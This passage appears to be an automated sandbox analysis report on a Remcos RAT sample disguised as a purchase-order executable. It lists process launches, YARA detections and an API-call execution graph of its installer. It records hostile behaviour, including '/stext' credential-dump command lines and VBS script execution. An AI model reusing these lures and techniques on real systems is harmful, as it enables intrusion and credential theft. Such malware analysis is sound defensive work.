                                                                                                                                                              MD5 hash:DBE4440D32DC0B20DEE76C192587AB33
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:137
                                                                                                                                                              Start time:09:42:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\blnru"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:771'320 bytes
                                                                                                                                                              MD5 hash:DBE4440D32DC0B20DEE76C192587AB33
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:138
                                                                                                                                                              Start time:09:42:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\dfsjvxzdl"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:771'320 bytes
                                                                                                                                                              MD5 hash:DBE4440D32DC0B20DEE76C192587AB33
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:139
                                                                                                                                                              Start time:09:42:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe /stext "C:\Users\user\AppData\Local\Temp\ohfuvpkfznra"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:771'320 bytes
                                                                                                                                                              MD5 hash:DBE4440D32DC0B20DEE76C192587AB33
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:140
                                                                                                                                                              Start time:09:47:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs"
                                                                                                                                                              Imagebase:0x3d0000
                                                                                                                                                              File size:147'456 bytes
                                                                                                                                                              MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:26.4%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:33.2%
                                                                                                                                                                Signature Coverage:19%
                                                                                                                                                                Total number of Nodes:686
                                                                                                                                                                Total number of Limit Nodes:17
                                                                                                                                                                execution_graph 2805 10001000 2808 1000101b 2805->2808 2815 100014d8 2808->2815 2810 10001020 2811 10001024 2810->2811 2812 10001027 GlobalAlloc 2810->2812 2813 100014ff 3 API calls 2811->2813 2812->2811 2814 10001019 2813->2814 2816 1000123b 3 API calls 2815->2816 2817 100014de 2816->2817 2818 100014e4 2817->2818 2819 100014f0 GlobalFree 2817->2819 2818->2810 2819->2810 2820 100010e0 2821 1000110e 2820->2821 2822 1000123b 3 API calls 2821->2822 2831 1000111e 2822->2831 2823 100011c4 GlobalFree 2824 100012bf 2 API calls 2824->2831 2825 100011c3 2825->2823 2826 1000123b 3 API calls 2826->2831 2827 10001278 2 API calls 2830 100011b1 GlobalFree 2827->2830 2828 10001155 GlobalAlloc 2828->2831 2829 100011ea GlobalFree 2829->2831 2830->2831 2831->2823 2831->2824 2831->2825 2831->2826 2831->2827 2831->2828 2831->2829 2831->2830 2832 100012e8 lstrcpyA 2831->2832 2832->2831 2102 100026c2 2103 10002712 2102->2103 2104 100026d2 VirtualProtect 2102->2104 2104->2103 2885 1000182a 2886 1000123b 3 API calls 2885->2886 2887 10001850 2886->2887 2888 1000123b 3 API calls 2887->2888 2889 10001858 2888->2889 2890 1000123b 3 API calls 2889->2890 2893 10001895 2889->2893 2891 1000187a 2890->2891 2892 10001883 GlobalFree 2891->2892 2892->2893 2894 10001278 2 API calls 2893->2894 2895 10001a0c GlobalFree GlobalFree 2894->2895 2896 402b4c 2897 402b5b SetTimer 2896->2897 2899 402b74 2896->2899 2897->2899 2898 402bc9 2899->2898 2900 402b8e MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 2899->2900 2900->2898 2414 4030ef #17 SetErrorMode OleInitialize 2487 405ea2 GetModuleHandleA 2414->2487 2418 40315f GetCommandLineA 2492 405b77 lstrcpynA 2418->2492 2420 403171 GetModuleHandleA 2421 403188 2420->2421 2422 40564f CharNextA 2421->2422 2423 40319c CharNextA 2422->2423 2426 4031ac 2423->2426 2424 403271 2425 403284 GetTempPathA 2424->2425 2493 4030bb 2425->2493 2426->2424 2426->2426 2431 40564f CharNextA 2426->2431 2435 403273 2426->2435 2428 40329c 2429 4032a0 GetWindowsDirectoryA lstrcatA 2428->2429 2430 4032f6 DeleteFileA 2428->2430 2432 4030bb 11 API calls 2429->2432 2501 402c33 GetTickCount GetModuleFileNameA 2430->2501 2431->2426 2434 4032bc 2432->2434 2434->2430 2439 4032c0 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 2434->2439 2583 405b77 lstrcpynA 2435->2583 2436 40330a 2437 4033a0 2436->2437 2440 403390 2436->2440 2444 40564f CharNextA 2436->2444 2600 403548 2437->2600 2442 4030bb 11 API calls 2439->2442 2529 403622 2440->2529 2446 4032ee 2442->2446 2447 403325 2444->2447 2446->2430 2446->2437 2454 40336b 2447->2454 2455 4033cf lstrcatA lstrcmpiA 2447->2455 2448 4033b9 2607 4053a8 2448->2607 2449 4034ad 2450 403530 ExitProcess 2449->2450 2452 405ea2 3 API calls 2449->2452 2457 4034bc 2452->2457 2584 405712 2454->2584 2455->2437 2459 4033eb CreateDirectoryA SetCurrentDirectoryA 2455->2459 2460 405ea2 3 API calls 2457->2460 2462 403402 2459->2462 2463 40340d 2459->2463 2464 4034c5 2460->2464 2611 405b77 lstrcpynA 2462->2611 2612 405b77 lstrcpynA 2463->2612 2467 405ea2 3 API calls 2464->2467 2469 4034ce 2467->2469 2472 40351c ExitWindowsEx 2469->2472 2478 4034dc GetCurrentProcess 2469->2478 2470 403385 2599 405b77 lstrcpynA 2470->2599 2471 405b99 18 API calls 2474 40344c DeleteFileA 2471->2474 2472->2450 2475 403529 2472->2475 2476 403459 CopyFileA 2474->2476 2484 40341b 2474->2484 2477 40140b 2 API calls 2475->2477 2476->2484 2477->2450 2481 4034ec 2478->2481 2479 4034a1 2482 405a2b 40 API calls 2479->2482 2481->2472 2482->2437 2483 405b99 18 API calls 2483->2484 2484->2471 2484->2479 2484->2483 2486 40348d CloseHandle 2484->2486 2613 405a2b 2484->2613 2618 405347 CreateProcessA 2484->2618 2486->2484 2488 405ec9 GetProcAddress 2487->2488 2489 405ebe LoadLibraryA 2487->2489 2490 403134 SHGetFileInfoA 2488->2490 2489->2488 2489->2490 2491 405b77 lstrcpynA 2490->2491 2491->2418 2492->2420 2494 405de2 5 API calls 2493->2494 2496 4030c7 2494->2496 2495 4030d1 2495->2428 2496->2495 2621 405624 lstrlenA CharPrevA 2496->2621 2628 405825 GetFileAttributesA CreateFileA 2501->2628 2503 402c73 2522 402c83 2503->2522 2629 405b77 lstrcpynA 2503->2629 2505 402c99 2630 40566b lstrlenA 2505->2630 2509 402caa GetFileSize 2510 402da6 2509->2510 2524 402cc1 2509->2524 2637 402bcf 2510->2637 2512 402daf 2514 402ddf GlobalAlloc 2512->2514 2512->2522 2671 4030a4 SetFilePointer 2512->2671 2648 4030a4 SetFilePointer 2514->2648 2516 402e12 2519 402bcf 6 API calls 2516->2519 2518 402dfa 2649 402e6c 2518->2649 2519->2522 2520 402dc8 2523 403072 ReadFile 2520->2523 2522->2436 2525 402dd3 2523->2525 2524->2510 2524->2516 2524->2522 2526 402bcf 6 API calls 2524->2526 2635 403072 ReadFile 2524->2635 2525->2514 2525->2522 2526->2524 2527 402e06 2527->2522 2527->2527 2528 402e43 SetFilePointer 2527->2528 2528->2522 2530 405ea2 3 API calls 2529->2530 2531 403636 2530->2531 2532 40363c 2531->2532 2533 40364e 2531->2533 2704 405ad5 wsprintfA 2532->2704 2534 405a5e 3 API calls 2533->2534 2535 403679 2534->2535 2537 403697 lstrcatA 2535->2537 2539 405a5e 3 API calls 2535->2539 2538 40364c 2537->2538 2688 4038e7 2538->2688 2539->2537 2542 405712 18 API calls 2543 4036c9 2542->2543 2544 403752 2543->2544 2546 405a5e 3 API calls 2543->2546 2545 405712 18 API calls 2544->2545 2547 403758 2545->2547 2548 4036f5 2546->2548 2549 403768 LoadImageA 2547->2549 2550 405b99 18 API calls 2547->2550 2548->2544 2554 403711 lstrlenA 2548->2554 2557 40564f CharNextA 2548->2557 2551 40380e 2549->2551 2552 40378f RegisterClassA 2549->2552 2550->2549 2553 40140b 2 API calls 2551->2553 2555 4037c5 SystemParametersInfoA CreateWindowExA 2552->2555 2582 403818 2552->2582 2556 403814 2553->2556 2558 403745 2554->2558 2559 40371f lstrcmpiA 2554->2559 2555->2551 2564 4038e7 19 API calls 2556->2564 2556->2582 2561 40370f 2557->2561 2560 405624 3 API calls 2558->2560 2559->2558 2562 40372f GetFileAttributesA 2559->2562 2565 40374b 2560->2565 2561->2554 2563 40373b 2562->2563 2563->2558 2566 40566b 2 API calls 2563->2566 2567 403825 2564->2567 2705 405b77 lstrcpynA 2565->2705 2566->2558 2569 403831 ShowWindow LoadLibraryA 2567->2569 2570 4038b4 2567->2570 2572 403850 LoadLibraryA 2569->2572 2573 403857 GetClassInfoA 2569->2573 2697 404f56 OleInitialize 2570->2697 2572->2573 2575 403881 DialogBoxParamA 2573->2575 2576 40386b GetClassInfoA RegisterClassA 2573->2576 2574 4038ba 2577 4038d6 2574->2577 2578 4038be 2574->2578 2579 40140b 2 API calls 2575->2579 2576->2575 2580 40140b 2 API calls 2577->2580 2581 40140b 2 API calls 2578->2581 2578->2582 2579->2582 2580->2582 2581->2582 2582->2437 2583->2425 2707 405b77 lstrcpynA 2584->2707 2586 405723 2708 4056bd CharNextA CharNextA 2586->2708 2589 403376 2589->2437 2598 405b77 lstrcpynA 2589->2598 2590 405de2 5 API calls 2595 405739 2590->2595 2591 405764 lstrlenA 2592 40576f 2591->2592 2591->2595 2593 405624 3 API calls 2592->2593 2596 405774 GetFileAttributesA 2593->2596 2595->2589 2595->2591 2597 40566b 2 API calls 2595->2597 2714 405e7b FindFirstFileA 2595->2714 2596->2589 2597->2591 2598->2470 2599->2440 2601 403560 2600->2601 2602 403552 CloseHandle 2600->2602 2717 40358d 2601->2717 2602->2601 2610 4053bd 2607->2610 2608 4033c7 ExitProcess 2609 4053d1 MessageBoxIndirectA 2609->2608 2610->2608 2610->2609 2611->2463 2612->2484 2614 405ea2 3 API calls 2613->2614 2615 405a32 2614->2615 2617 405a53 2615->2617 2774 40589d lstrcpyA 2615->2774 2617->2484 2619 405382 2618->2619 2620 405376 CloseHandle 2618->2620 2619->2484 2620->2619 2622 4030d9 CreateDirectoryA 2621->2622 2623 40563e lstrcatA 2621->2623 2624 405854 2622->2624 2623->2622 2625 40585f GetTickCount GetTempFileNameA 2624->2625 2626 4030ed 2625->2626 2627 40588c 2625->2627 2626->2428 2627->2625 2627->2626 2628->2503 2629->2505 2631 405678 2630->2631 2632 402c9f 2631->2632 2633 40567d CharPrevA 2631->2633 2634 405b77 lstrcpynA 2632->2634 2633->2631 2633->2632 2634->2509 2636 403093 2635->2636 2636->2524 2638 402bf0 2637->2638 2639 402bd8 2637->2639 2642 402c00 GetTickCount 2638->2642 2643 402bf8 2638->2643 2640 402be1 DestroyWindow 2639->2640 2641 402be8 2639->2641 2640->2641 2641->2512 2645 402c31 2642->2645 2646 402c0e CreateDialogParamA ShowWindow 2642->2646 2672 405edb 2643->2672 2645->2512 2646->2645 2648->2518 2651 402e84 2649->2651 2650 402eb1 2653 403072 ReadFile 2650->2653 2651->2650 2687 4030a4 SetFilePointer 2651->2687 2654 402ebc 2653->2654 2655 403001 2654->2655 2656 402ece GetTickCount 2654->2656 2658 402fec 2654->2658 2657 40304d 2655->2657 2662 403005 2655->2662 2656->2658 2668 402ef7 2656->2668 2659 403072 ReadFile 2657->2659 2658->2527 2659->2658 2660 403072 ReadFile 2660->2668 2661 403072 ReadFile 2661->2662 2662->2658 2662->2661 2663 403025 WriteFile 2662->2663 2663->2658 2664 40303a 2663->2664 2664->2658 2664->2662 2665 40304b 2664->2665 2665->2658 2666 402f4d GetTickCount 2666->2668 2667 402f76 MulDiv wsprintfA 2676 404e84 2667->2676 2668->2658 2668->2660 2668->2666 2668->2667 2670 402fb4 WriteFile 2668->2670 2670->2658 2670->2668 2671->2520 2673 405ef8 PeekMessageA 2672->2673 2674 402bfe 2673->2674 2675 405eee DispatchMessageA 2673->2675 2674->2512 2675->2673 2677 404f42 2676->2677 2678 404e9f 2676->2678 2677->2668 2679 404ebc lstrlenA 2678->2679 2680 405b99 18 API calls 2678->2680 2681 404ee5 2679->2681 2682 404eca lstrlenA 2679->2682 2680->2679 2684 404ef8 2681->2684 2685 404eeb SetWindowTextA 2681->2685 2682->2677 2683 404edc lstrcatA 2682->2683 2683->2681 2684->2677 2686 404efe SendMessageA SendMessageA SendMessageA 2684->2686 2685->2684 2686->2677 2687->2650 2689 4038fb 2688->2689 2706 405ad5 wsprintfA 2689->2706 2691 40396c 2692 405b99 18 API calls 2691->2692 2693 403978 SetWindowTextA 2692->2693 2694 403994 2693->2694 2695 4036a7 2693->2695 2694->2695 2696 405b99 18 API calls 2694->2696 2695->2542 2696->2694 2698 403ed3 SendMessageA 2697->2698 2703 404f79 2698->2703 2699 404fa0 2700 403ed3 SendMessageA 2699->2700 2701 404fb2 OleUninitialize 2700->2701 2701->2574 2702 401389 2 API calls 2702->2703 2703->2699 2703->2702 2704->2538 2705->2544 2706->2691 2707->2586 2709 4056d8 2708->2709 2711 4056e8 2708->2711 2710 4056e3 CharNextA 2709->2710 2709->2711 2713 405708 2710->2713 2712 40564f CharNextA 2711->2712 2711->2713 2712->2711 2713->2589 2713->2590 2715 405e91 FindClose 2714->2715 2716 405e9c 2714->2716 2715->2716 2716->2595 2718 40359b 2717->2718 2719 403565 2718->2719 2720 4035a0 FreeLibrary GlobalFree 2718->2720 2721 405454 2719->2721 2720->2719 2720->2720 2722 405712 18 API calls 2721->2722 2723 405474 2722->2723 2724 405493 2723->2724 2725 40547c DeleteFileA 2723->2725 2731 4055c1 2724->2731 2761 405b77 lstrcpynA 2724->2761 2726 4033a9 OleUninitialize 2725->2726 2726->2448 2726->2449 2728 4054b9 2729 4054cc 2728->2729 2730 4054bf lstrcatA 2728->2730 2733 40566b 2 API calls 2729->2733 2732 4054d2 2730->2732 2731->2726 2734 405e7b 2 API calls 2731->2734 2735 4054e0 lstrcatA 2732->2735 2737 4054eb lstrlenA FindFirstFileA 2732->2737 2733->2732 2736 4055e5 2734->2736 2735->2737 2736->2726 2738 4055e9 2736->2738 2737->2731 2744 40550f 2737->2744 2739 405624 3 API calls 2738->2739 2741 4055ef 2739->2741 2740 40564f CharNextA 2740->2744 2742 40540c 5 API calls 2741->2742 2743 4055fb 2742->2743 2745 405615 2743->2745 2746 4055ff 2743->2746 2744->2740 2749 4055a0 FindNextFileA 2744->2749 2755 405454 64 API calls 2744->2755 2758 40556a 2744->2758 2762 405b77 lstrcpynA 2744->2762 2748 404e84 25 API calls 2745->2748 2746->2726 2750 404e84 25 API calls 2746->2750 2748->2726 2749->2744 2751 4055b8 FindClose 2749->2751 2752 40560c 2750->2752 2751->2731 2753 405a2b 40 API calls 2752->2753 2756 405613 2753->2756 2755->2758 2756->2726 2757 404e84 25 API calls 2757->2749 2758->2749 2758->2757 2759 404e84 25 API calls 2758->2759 2760 405a2b 40 API calls 2758->2760 2763 40540c 2758->2763 2759->2758 2760->2758 2761->2728 2762->2744 2771 405800 GetFileAttributesA 2763->2771 2766 405439 2766->2758 2767 405427 RemoveDirectoryA 2769 405435 2767->2769 2768 40542f DeleteFileA 2768->2769 2769->2766 2770 405445 SetFileAttributesA 2769->2770 2770->2766 2772 405812 SetFileAttributesA 2771->2772 2773 405418 2771->2773 2772->2773 2773->2766 2773->2767 2773->2768 2775 4058c6 2774->2775 2776 4058ec GetShortPathNameA 2774->2776 2798 405825 GetFileAttributesA CreateFileA 2775->2798 2778 405901 2776->2778 2779 405a25 2776->2779 2778->2779 2781 405909 wsprintfA 2778->2781 2779->2617 2780 4058d0 CloseHandle GetShortPathNameA 2780->2779 2782 4058e4 2780->2782 2783 405b99 18 API calls 2781->2783 2782->2776 2782->2779 2784 405931 2783->2784 2799 405825 GetFileAttributesA CreateFileA 2784->2799 2786 40593e 2786->2779 2787 40594d GetFileSize GlobalAlloc 2786->2787 2788 405a1e CloseHandle 2787->2788 2789 40596f ReadFile 2787->2789 2788->2779 2789->2788 2790 405987 2789->2790 2790->2788 2800 40578a lstrlenA 2790->2800 2793 4059a0 lstrcpyA 2796 4059c2 2793->2796 2794 4059b4 2795 40578a 4 API calls 2794->2795 2795->2796 2797 4059f9 SetFilePointer WriteFile GlobalFree 2796->2797 2797->2788 2798->2780 2799->2786 2801 4057cb lstrlenA 2800->2801 2802 4057d3 2801->2802 2803 4057a4 lstrcmpiA 2801->2803 2802->2793 2802->2794 2803->2802 2804 4057c2 CharNextA 2803->2804 2804->2801 2833 10002110 2834 10002175 2833->2834 2836 100021ab 2833->2836 2835 10002187 GlobalAlloc 2834->2835 2834->2836 2835->2834 2837 100015d0 2838 100014d8 4 API calls 2837->2838 2840 100015e8 2838->2840 2839 1000162e GlobalFree 2840->2839 2841 10001603 2840->2841 2842 1000161a VirtualFree 2840->2842 2841->2839 2842->2839 2105 4039b4 2106 403b07 2105->2106 2107 4039cc 2105->2107 2109 403b58 2106->2109 2110 403b18 GetDlgItem GetDlgItem 2106->2110 2107->2106 2108 4039d8 2107->2108 2111 4039e3 SetWindowPos 2108->2111 2112 4039f6 2108->2112 2114 403bb2 2109->2114 2122 401389 2 API calls 2109->2122 2113 403e87 19 API calls 2110->2113 2111->2112 2116 403a13 2112->2116 2117 4039fb ShowWindow 2112->2117 2118 403b42 SetClassLongA 2113->2118 2135 403b02 2114->2135 2175 403ed3 2114->2175 2119 403a35 2116->2119 2120 403a1b DestroyWindow 2116->2120 2117->2116 2121 40140b 2 API calls 2118->2121 2124 403a3a SetWindowLongA 2119->2124 2125 403a4b 2119->2125 2174 403e10 2120->2174 2121->2109 2123 403b8a 2122->2123 2123->2114 2126 403b8e SendMessageA 2123->2126 2124->2135 2129 403af4 2125->2129 2130 403a57 GetDlgItem 2125->2130 2126->2135 2127 40140b 2 API calls 2144 403bc4 2127->2144 2128 403e12 DestroyWindow EndDialog 2128->2174 2212 403eee 2129->2212 2133 403a87 2130->2133 2134 403a6a SendMessageA IsWindowEnabled 2130->2134 2132 403e41 ShowWindow 2132->2135 2137 403a94 2133->2137 2138 403adb SendMessageA 2133->2138 2139 403aa7 2133->2139 2149 403a8c 2133->2149 2134->2133 2134->2135 2137->2138 2137->2149 2138->2129 2141 403ac4 2139->2141 2142 403aaf 2139->2142 2146 40140b 2 API calls 2141->2146 2206 40140b 2142->2206 2143 403ac2 2143->2129 2144->2127 2144->2128 2144->2135 2147 403e87 19 API calls 2144->2147 2165 403d52 DestroyWindow 2144->2165 2178 405b99 2144->2178 2196 403e87 2144->2196 2148 403acb 2146->2148 2147->2144 2148->2129 2148->2149 2209 403e60 2149->2209 2151 403c3f GetDlgItem 2152 403c54 2151->2152 2153 403c5c ShowWindow KiUserCallbackDispatcher 2151->2153 2152->2153 2199 403ea9 KiUserCallbackDispatcher 2153->2199 2155 403c86 EnableWindow 2156 403c9a 2155->2156 2157 403c9f GetSystemMenu EnableMenuItem SendMessageA 2156->2157 2200 403ebc SendMessageA 2156->2200 2201 405b77 lstrcpynA 2156->2201 2157->2156 2158 403ccf SendMessageA 2157->2158 2158->2156 2161 403cfd lstrlenA 2162 405b99 18 API calls 2161->2162 2163 403d0e SetWindowTextA 2162->2163 2202 401389 2163->2202 2166 403d6c CreateDialogParamA 2165->2166 2165->2174 2167 403d9f 2166->2167 2166->2174 2168 403e87 19 API calls 2167->2168 2169 403daa GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2168->2169 2170 401389 2 API calls 2169->2170 2171 403df0 2170->2171 2171->2135 2172 403df8 ShowWindow 2171->2172 2173 403ed3 SendMessageA 2172->2173 2173->2174 2174->2132 2174->2135 2176 403eeb 2175->2176 2177 403edc SendMessageA 2175->2177 2176->2144 2177->2176 2183 405ba6 2178->2183 2179 405dc9 2180 405dde 2179->2180 2242 405b77 lstrcpynA 2179->2242 2180->2144 2182 405c47 GetVersion 2182->2183 2183->2179 2183->2182 2184 405da0 lstrlenA 2183->2184 2185 405b99 10 API calls 2183->2185 2188 405cbf GetSystemDirectoryA 2183->2188 2190 405cd2 GetWindowsDirectoryA 2183->2190 2192 405b99 10 API calls 2183->2192 2193 405d49 lstrcatA 2183->2193 2194 405d06 SHGetSpecialFolderLocation 2183->2194 2226 405a5e RegOpenKeyExA 2183->2226 2231 405de2 2183->2231 2240 405ad5 wsprintfA 2183->2240 2241 405b77 lstrcpynA 2183->2241 2184->2183 2185->2184 2188->2183 2190->2183 2192->2183 2193->2183 2194->2183 2195 405d1e SHGetPathFromIDListA CoTaskMemFree 2194->2195 2195->2183 2197 405b99 18 API calls 2196->2197 2198 403e92 SetDlgItemTextA 2197->2198 2198->2151 2199->2155 2200->2156 2201->2161 2204 401390 2202->2204 2203 4013fe 2203->2144 2204->2203 2205 4013cb MulDiv SendMessageA 2204->2205 2205->2204 2207 401389 2 API calls 2206->2207 2208 401420 2207->2208 2208->2149 2210 403e67 2209->2210 2211 403e6d SendMessageA 2209->2211 2210->2211 2211->2143 2213 403f06 GetWindowLongA 2212->2213 2223 403f8f 2212->2223 2214 403f17 2213->2214 2213->2223 2215 403f26 GetSysColor 2214->2215 2216 403f29 2214->2216 2215->2216 2217 403f39 SetBkMode 2216->2217 2218 403f2f SetTextColor 2216->2218 2219 403f51 GetSysColor 2217->2219 2220 403f57 2217->2220 2218->2217 2219->2220 2221 403f68 2220->2221 2222 403f5e SetBkColor 2220->2222 2221->2223 2224 403f82 CreateBrushIndirect 2221->2224 2225 403f7b DeleteObject 2221->2225 2222->2221 2223->2135 2224->2223 2225->2224 2227 405a91 RegQueryValueExA 2226->2227 2228 405acf 2226->2228 2229 405ab2 RegCloseKey 2227->2229 2228->2183 2229->2228 2238 405dee 2231->2238 2232 405e56 2233 405e5a CharPrevA 2232->2233 2235 405e75 2232->2235 2233->2232 2234 405e4b CharNextA 2234->2232 2234->2238 2235->2183 2237 405e39 CharNextA 2237->2238 2238->2232 2238->2234 2238->2237 2239 405e46 CharNextA 2238->2239 2243 40564f 2238->2243 2239->2234 2240->2183 2241->2183 2242->2180 2244 405655 2243->2244 2245 405668 2244->2245 2246 40565b CharNextA 2244->2246 2245->2238 2246->2244 2843 10001637 2844 10001666 2843->2844 2845 10001a86 19 API calls 2844->2845 2846 1000166d 2845->2846 2847 10001680 2846->2847 2848 10001674 2846->2848 2850 100016a7 2847->2850 2851 1000168a 2847->2851 2849 10001278 2 API calls 2848->2849 2857 1000167e 2849->2857 2852 100016d1 2850->2852 2853 100016ad 2850->2853 2854 100014ff 3 API calls 2851->2854 2856 100014ff 3 API calls 2852->2856 2855 10001576 3 API calls 2853->2855 2858 1000168f 2854->2858 2860 100016b2 2855->2860 2856->2857 2859 10001576 3 API calls 2858->2859 2861 10001695 2859->2861 2862 10001278 2 API calls 2860->2862 2863 10001278 2 API calls 2861->2863 2864 100016b8 GlobalFree 2862->2864 2865 1000169b GlobalFree 2863->2865 2864->2857 2866 100016cc GlobalFree 2864->2866 2865->2857 2866->2857 2867 10002977 2868 1000298f 2867->2868 2869 10001551 2 API calls 2868->2869 2870 100029aa 2869->2870 2871 10001058 2872 1000123b 3 API calls 2871->2872 2874 10001074 2872->2874 2873 100010dc 2874->2873 2875 100014d8 4 API calls 2874->2875 2876 10001091 2874->2876 2875->2876 2877 100014d8 4 API calls 2876->2877 2878 100010a1 2877->2878 2879 100010b1 2878->2879 2880 100010a8 GlobalSize 2878->2880 2881 100010b5 GlobalAlloc 2879->2881 2882 100010c6 2879->2882 2880->2879 2883 100014ff 3 API calls 2881->2883 2884 100010d1 GlobalFree 2882->2884 2883->2882 2884->2873 2247 100016da 2248 1000170a 2247->2248 2290 10001a86 2248->2290 2250 10001711 2251 10001827 2250->2251 2252 10001722 2250->2252 2253 10001729 2250->2253 2339 10002165 2252->2339 2321 100021af 2253->2321 2258 1000178d 2262 10001793 2258->2262 2263 100017cf 2258->2263 2259 1000176f 2352 1000236d 2259->2352 2260 10001758 2264 1000175d 2260->2264 2276 1000174e 2260->2276 2261 1000173f 2266 10001745 2261->2266 2271 10001750 2261->2271 2267 10001576 3 API calls 2262->2267 2269 1000236d 14 API calls 2263->2269 2349 10002a57 2264->2349 2266->2276 2333 1000279c 2266->2333 2274 100017a9 2267->2274 2280 100017c1 2269->2280 2343 10002540 2271->2343 2277 1000236d 14 API calls 2274->2277 2276->2258 2276->2259 2277->2280 2278 100017d6 2281 10001816 2278->2281 2376 10002333 2278->2376 2280->2278 2281->2251 2283 10001820 GlobalFree 2281->2283 2283->2251 2287 10001802 2287->2281 2380 100014ff wsprintfA 2287->2380 2289 100017fb FreeLibrary 2289->2287 2383 10001215 GlobalAlloc 2290->2383 2292 10001aaa 2384 10001215 GlobalAlloc 2292->2384 2294 10001ab5 2385 1000123b 2294->2385 2296 10001cc5 GlobalFree GlobalFree GlobalFree 2297 10001ce2 2296->2297 2314 10001d2c 2296->2314 2298 1000201b 2297->2298 2307 10001cf7 2297->2307 2297->2314 2300 1000203c GetModuleHandleA 2298->2300 2298->2314 2299 10001b6f GlobalAlloc 2319 10001abd 2299->2319 2302 1000204d LoadLibraryA 2300->2302 2303 1000205e 2300->2303 2301 10001be3 GlobalFree 2301->2319 2302->2303 2302->2314 2396 100015c1 GetProcAddress 2303->2396 2304 10001bbe lstrcpyA 2305 10001bc8 lstrcpyA 2304->2305 2305->2319 2307->2314 2392 10001224 2307->2392 2308 10002070 2309 10002081 lstrlenA 2308->2309 2308->2314 2397 100015c1 GetProcAddress 2309->2397 2313 10001fbf lstrcpyA 2313->2319 2314->2250 2315 1000209a 2315->2314 2316 10001c25 2316->2319 2390 10001551 GlobalSize GlobalAlloc 2316->2390 2317 10001e78 GlobalFree 2317->2319 2319->2296 2319->2299 2319->2301 2319->2304 2319->2305 2319->2313 2319->2316 2319->2317 2320 10001224 2 API calls 2319->2320 2395 10001215 GlobalAlloc 2319->2395 2320->2319 2326 100021c7 2321->2326 2322 1000123b 3 API calls 2322->2326 2324 100022fc GlobalFree 2325 1000172f 2324->2325 2324->2326 2325->2260 2325->2261 2325->2276 2326->2322 2326->2324 2327 10001224 GlobalAlloc lstrcpynA 2326->2327 2328 10002284 GlobalAlloc MultiByteToWideChar 2326->2328 2331 10002263 lstrlenA 2326->2331 2400 100012bf 2326->2400 2327->2326 2329 10002272 2328->2329 2330 100022ae GlobalAlloc CLSIDFromString GlobalFree 2328->2330 2329->2324 2405 100024d4 2329->2405 2330->2324 2331->2324 2331->2329 2335 100027ae 2333->2335 2334 10002853 VirtualAlloc 2336 10002871 2334->2336 2335->2334 2337 10002962 GetLastError 2336->2337 2338 1000296d 2336->2338 2337->2338 2338->2276 2340 10002175 2339->2340 2342 10001728 2339->2342 2341 10002187 GlobalAlloc 2340->2341 2340->2342 2341->2340 2342->2253 2344 1000255c 2343->2344 2345 100025c0 2344->2345 2346 100025ad GlobalAlloc 2344->2346 2347 100025c5 GlobalSize 2345->2347 2348 100025cf 2345->2348 2346->2348 2347->2348 2348->2276 2350 10002a62 2349->2350 2351 10002aa2 GlobalFree 2350->2351 2363 10002388 2352->2363 2354 1000246c lstrcpyA 2354->2363 2355 100023cc wsprintfA 2355->2363 2356 10002444 lstrcpynA 2356->2363 2357 1000248d GlobalFree 2357->2363 2358 100024b6 GlobalFree 2359 10001775 2358->2359 2358->2363 2365 10001576 2359->2365 2360 10002421 WideCharToMultiByte 2360->2363 2361 10001278 2 API calls 2361->2363 2362 100023e0 GlobalAlloc StringFromGUID2 WideCharToMultiByte GlobalFree 2362->2363 2363->2354 2363->2355 2363->2356 